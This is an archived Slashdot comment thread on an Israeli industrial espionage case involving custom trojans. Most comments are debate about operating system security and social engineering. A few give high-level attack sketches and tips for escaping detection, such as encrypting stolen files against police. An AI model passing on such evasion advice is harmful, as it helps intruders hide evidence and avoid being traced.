Slashdot Mirror

← Back to Stories (view on slashdot.org)

Trojan Built for Industrial Espionage

Posted by CmdrTaco on from the cloak-dagger-and-the-almighty-buck dept.

xPertCodert writes "Some of the largest Israeli companies are involved in the major industral espionage case, in which private investigators implanted specially crafted Trojan horses on the computers at unsuspecting companies in a bid to obtain priviledged financial and technical data. Given the current state of Windows security and advances in spyware, probably any company has become a very easy target for such spy attack from competitors"

25 of 232 comments (clear)

  1. Good by Anonymous Coward · · Score: 3, Insightful

    maybe such incidents will start companies (and Microsoft in particular) to start taking spyware more seriously

    1. Re:Good by Leroy_Brown242 · · Score: 4, Insightful

      HAH!

      Learning from other mistakes? I think you give the industry too much credit. :)

      --
      Pretty Pictures!
    2. Re:Good by pv2b · · Score: 3, Insightful

      As I said in another thread, the problem isn't computer insecurity, but the fact that people will install anything given enough social engineering. Even if you use an operating system like Mac OS X or Linux or something else similar, where the users aren't typically logged in as root, you can still spy on the user whose account you've infected, which is enough damage right there.

    3. Re:Good by pv2b · · Score: 2, Insightful

      Social engineering.

      1. E-mail the user a "Free Porn" program. This program is then set to launch every time the user logs in. (To make it more plausible, the program then launches a Safari window pointing at your favorite porn site.)

      2. The program is basically a glorified FTP server, allowing the attacker to log into it and retreive any files accessible from the account. To get past firewalls, it could evenly actively connect outward to another host to receive instructions, or even be controlled via e-mail.

      Voilà, corporate espionage on Mac OS X or Linux per social engineering.

      Not very subtle, but very effective.

    4. Re:Good by Dwonis · · Score: 4, Insightful
      Linux probably does not have "just about as many security flaws as Windows", because its design is simpler and there are fewer places for things to go wrong, among other reasons. You are obviously making statements that about things you know hardly anything about, so I put you in my foes list to remind me of that.

      However, you've touched on an important point about computer security: to an attacker, the number of security holes in a system is almost totally irrelevant. If I were an attacker, I'd be more concerned about the types of security holes in a system, than the absolute number of them. For example, if I run a malicious webserver, and my goal is to install a key-logging driver into the kernel of a Linux machine that accesses my webserver, I need two types of security flaws: one in the web browser that lets me execute arbitrary code, and one in the OS so I can get root privileges to install the driver.

      This where people get confused. Having 2 or 2000 local root holes doesn't help me if I can't execute arbitrary code on the computer, and having 2 or 2000 arbitrary code execution holes doesn't help me if I can't get root privileges. I need exactly one hole of each type for my attack to be successful. Beyond that, it makes little difference.

      So, if you create two categories, "secure" and "not secure", Linux and Windows fall into the same category: "not secure". Most systems fall into that category. If you're a decision-maker, and you're forced to use some of these systems, even though you know that they are all "not secure", which ones do you choose?

      You choose the ones that are going to minimize your risk. If that means choosing Linux, or some heterogeneous mix of systems, simply because that arrangement is less popular and therefore less likely to be exploited, then so be it. It's still a sound decision, given the circumstances.

      Regarding people demonizing Microsoft, don't you find it the least bit pathetic that a loosely-knit group of poorly-organized hobbyists working on their spare time can be even remotely competitive against the industry leader, a company that can spend billions of dollars per year on software development?

      What about all the people over the last decade who trusted Microsoft with their data, only to find out that (until recently) Microsoft didn't care about keeping it secure? Should they not be angry?

      What about Microsoft's idea of "ease of use": menus that are never in the same place, and word processors that mangle your data because "it looks like you're writing a letter"? Or how about the general Microsoft "we know better" attitude? Software that makes your computer not do what it's told (DRM)? Product keys? EULAs? Software patents? Mandatory file locks (sharing violation)? The Win32 API? Broken CSS support? Horrible context-switching performance? mikerowesoft.com? "Best Viewed with Internet Explorer"? The need to use defrag.exe? The DR-DOS error messages? Abandoning OS/2? "Abort/Retry/Ignore/Fail"? Direct3D? ActiveX? DLL Hell? "There are no significant bugs in our released software that any significant number of users want fixed"? The way the MSN website seemed to deliberately break itself when people used Opera to view it?

      Microsoft is a leader that's doing a crappy job, on top of its selfish motivations. People don't like that. You may not see Microsoft as being evil, but you shouldn't be surprised or disgusted that others do.

  2. Everyone is volnerable by a_greer2005 · · Score: 3, Insightful
    In a big company that has a lot of enemies, somewithin its own gates no doubt, this could happen to any system that is not set up perfectly, a rootkit could be introduced on a *nix system the same way 99% of trojen horses get into win boxes, social engenering.

    By its verry nature, a trogen is a program that APPREARS to be good but has an evil payload. once again, the problem is gullible users and/or techs and/or admins. not windows per-se.

    1. Re:Everyone is volnerable by Rakshasa+Taisab · · Score: 2, Insightful

      I'm really not gonna comment on the spelling of the parent post... though...

      According to your logic, it doesn't matter if you store millions of dollars in cash under the bed, since a safe is also vulnerable to break-ins.

      --
      - These characters were randomly selected.
  3. Trojans != Security Failure by yotto · · Score: 2, Insightful

    I thought that Trojans were programs that pretended to be something legit but weren't. Other than finding them and putting them in a list of programs to delete in a virus scanner, is there a way to be "secure" with these?
    If the company you are tailoring these trojans to runs Linux, aren't you, as the evil terrorist hacker, going to tailor the trojan to run on Linux?
    Send 90% of the CEOs out there an email that says 'click here for a free iPod!' and we all know what they're going to do, whether they run Windows, Linux, or OS X.

    --
    Pulp Audio Weekly - Geek News and Reviews
  4. Shouldn't be a problem... by Anonymous Coward · · Score: 2, Insightful

    Smart people shouldn't have that kind of data on a computer that could be attacked by spyware. Keep it on a network segregated from the internet and you keep it to an insider-only problem.

  5. Spyware by mfh · · Score: 1, Insightful

    Microsoft sees spyware as an opportunity for profit.

    --
    The dangers of knowledge trigger emotional distress in human beings.
    1. Re:Spyware by Karzz1 · · Score: 3, Insightful

      Not to mention their new anti-virus business (a subscription service which couples MS anti-virus with their anti-spyware). Am I the only one that sees the conflict of interests here?

      --
      Beware of he who would deny you access to information, for in his heart he dreams himself your master.
  6. Trojans ==human failure. by Anonymous Coward · · Score: 1, Insightful

    To quote a poster when the above is pointed out. "According to your logic, it doesn't matter if you store millions of dollars in cash under the bed, since a safe is also vulnerable to break-ins."

    Ignoring the facts that security is a process, not an absolute, and technical solutions to social problems are hard. Ultimately all solutions can be twarfted, given enough time and resources. The goal however is to make whatever they want difficult enough to get, that when they do get it, it'll be worth nothing.

  7. Cheap Shots by The_Quinn · · Score: 4, Insightful
    It is cheap to poke your security knife at microsoft. As you probably know, Linux has its own security issues

    I've dealt with Linux security enough to know security is work for any OS, especially when you are not just running servers for developers or apps. When you get into linux desktop users, security takes a lot of work and attention.

    --
    Mine is Good
  8. Re:The answer to these problems ... by Jeff+DeMaagd · · Score: 3, Insightful

    Trojans are about social engineering. The only way to stop trojans is to prevent the people that might fall for them from ever being able to execute unauthorized programs.

  9. Try It Again, With Strong Encryption! by putko · · Score: 3, Insightful

    "... [The authorities] found dozens of FTP servers in Israel and overseas, including the US. Haephrati is suspected of transferring stolen material from other computers to these FTP servers. The police realized the extent of the affair when they examined some of the files..."

    If there was ever a time to be using encrypted volumes to store files, that was one of them.

    The guy has fileservers full of self-incriminating evidence, but he can't even get his act together enough to strongly encrypt the thing? That's pretty damn sloppy.

    If you did it right, all the cops would have was a bunch of bits, not stuff to put you away for a long time. This tells me the guy wasn't really trying hard enough. He needs to do it again, with feeling.

    --
    http://www.thebricktestament.com/the_law/when_to_s tone_your_children/dt21_18a.html
  10. Re:Check (point) your VPN/Firewall by Soul-Burn666 · · Score: 2, Insightful

    The best and strongest firewalls can't protect unsuspecting users from installing trojans by themselves.
    Hell, it doesn't even matter what operating system you use. If you run a trojan/keylogger, the data will leak. It doesn't matter if you're in user mode, all the information you can access can leak outside.

    Surely an easily exploitable system will generally be more prone to this, without user interaction.

    --
    ^_^
  11. The reality is.... by zappepcs · · Score: 3, Insightful

    that this type of attack has most probably been going on for years, without being detected.

    More sophisticated worms and trojans will happen. Think of a virus that stealthily hides on computers, moving across the network till it finds itself on a machine in domain xyz.com. Once there it promulgates quietly, doing no damage, until one of its copies finds files of the variety xxxxx.xls. Then slowly searching those files, sending bits of it back to a server on the internet disguised as mail from the user of that machine.

    It gets even scarier. Imagine that virus looking for your company's cvs server?

    The only thing that I can think of to combat it is to ensure that all applications are checked before being run, and that they have certification by company security infrastructure. This might prevent joe bloggs from working at home and bringing the trojan to work with him.

    It can be done if the program is executed by the user without verification of certification etc.

    To totally lock down your network will become very difficult in the future. Commercial antivirus vendors will have to work very closely with OS groups to actually create a secure computing environment.... and user's will not like the efforts they have to go through to participate in that secure environment.

    The current efforts by software vendors and groups will not even come close to stopping such spyware programs.

    Well, that's how I see it anyway... who knows for sure.

    --
    Support NYCountryLawyer RIAA vs People
  12. A lot of this spy stuff just cancels out by Simonetta · · Score: 3, Insightful

    A lot of the supposed loss that results from espionage is mitigated by the fact that the stolen data simply goes from one inept corporate bureaucracy to another. As much as they'd like to, most lame, ossified organizations can't do much to improve their own position regardless of the strategic worth of stolen competitor's data.
    It's just 'Spy vs. Spy'; an endless expensive game that changes very little in the real world.

    And regarding the use of social engineering to break into secure systems and procure passwords, it too has exagerated importance. The old fashioned tried-and-true methods of blackmail, bribery, kidnapping, and extortion work as well if not better in modern corporate and military environments as they have for hundreds of years. The stricter the corporate punishment for transgressions, the more inflexible the rules, the harder the no-tolerance policy... the cheaper and easier it is to use blackmail and bribery on the target employees. This is why the Americans can't destroy 'the base' (whose Arabic name triggers the NSA internet evesdropping software). They can't be blackmailed, bribed, or persuaded with. Hell, they can't even be found.
    You want a secure corporate environment? Trust your people, pay your people reasonably, don't assume that you can judge their moral character by the molecular structure of their urine. In other words, don't act like a stupid paranoid American.

  13. Could this be the start of a new wave of Trojens? by Laurance · · Score: 1, Insightful

    How open are banks to this kind of attack ? Or Credit Companys or anyone of the other 1000's of companys that we give our personal data to.

  14. Cheap Shot. by DerekLyons · · Score: 2, Insightful
    Given the current state of Windows security and advances in spyware, probably any company has become a very easy target for such spy attack from competitors
    And of course *no* company knows anything about firewalls, or email scanners, or browser security.... I.E. the article submitter is doing nothing more than taking yet another cheap shot at Microsoft.
  15. Re:Check (point) your VPN/Firewall by DerekLyons · · Score: 1, Insightful
    I'm sure glad I don't rely on closed source products for my security needs. :)
    And of course, you've read (and understood) every single line of code in the source and thus know for certain that your open source product is in fact 100% secure and trustworthy.

    No? Well then, you are absolutely certain that a person well known to you and who you'd trust with unlimited acess to your computer has done so?

    No? Then why exactly *do* you trust this code? Because a couple of dozen random strangers have pronounced it good? Because it's been 'in the market' for a while, and no vulnerabilities have surfaced? (Yet.)

    The open or closed state of the code is no gauruntee of security. (Witness the spate of recent security updates to Firefox.)

  16. Re:They had insiders, politicians helping them ste by S3D · · Score: 4, Insightful
    I think Israel is the reason for all the problems in the world. All muslims hate them for good reason.
    I'm not surprised such kind of post appear on the slashdot, but I'm shocked it moderated "insigtful"
  17. Re:Check (point) your VPN/Firewall by bit01 · · Score: 2, Insightful

    Zealot.

    He didn't claim FOSS security was guaranteed as your entire post assumes. He claimed it was a better alternative than a company with an obvious vested interest.

    ---

    Commercial software bigots - a dying breed.

  18. Re:What then is happening in other places? by Muhammar · · Score: 2, Insightful

    It is happening elsewhere. With less publicity.

    If you are not dumb, you do this kind of job only once or twice. You cover all tracks. And, holy Moses, you don't use your own company to send out e-mails and CDs with the malware.

    1.The author of these trojans tried to sell them to police (and was turned down because police found out that he was selling cracker stuff).
    2.He sold his trojan package to couple of "security" agencies who went ahead and stole data from several rich companies to re-sell them to the highest bidder.
    3. The trojan author also used his "expertise" to steal and publish a book from his ex-father-in law.

    Clearly, this guy must have been eager to get in jail. He was lucky - he could have got whacked instead.

    --
    I doubt that we will ever figure out - and I suspect that even if we did figure out we couldn't do much about it
  19. OS security doesn't matter much ... by hadaso · · Score: 2, Insightful

    OS security doesn't matter much if you're doing your daily routine as admin/root. People who configure Windows machines tend to solve problems of "software not running" by giving the user admin priviledges. Then any stupid email attachment can install anything. You'd have the same problem if a Unix sysadmin decides to save time solving a user's problem by giving the user root privileges. And if Linux becomes more common you'd see much more of this kind of "problem solving" ("fumble with things until they work, then don't touch anything. Don't try to solve tomorrow's problem. You're paid only to solve the current problem". Of course it works and you cease to touch it when it has to many permissions...)

    The way this story was revealed was that the stupid guy who planted these trojans published publicly excerpts from his ex-wife's father (or mother's husband?) that existed only on the guy's PC. Probably that PC was a private PC that was configured exactly as shipped (i.e., single admin account). Security of the OS doesn't really matter in this setting. I think the real story here was that so many big companies (telecom, sattlite TV etc.) bought services from a guy so unprofessional as to host their stuff on the same servers that he uses for revenge against his ex-wife's parent, and then to reveal enough info so that the police can get to him! Obviously he's not a pro. Any pro would have known to use separate destinations for different trojans, and not to reveal info that leads to a single source...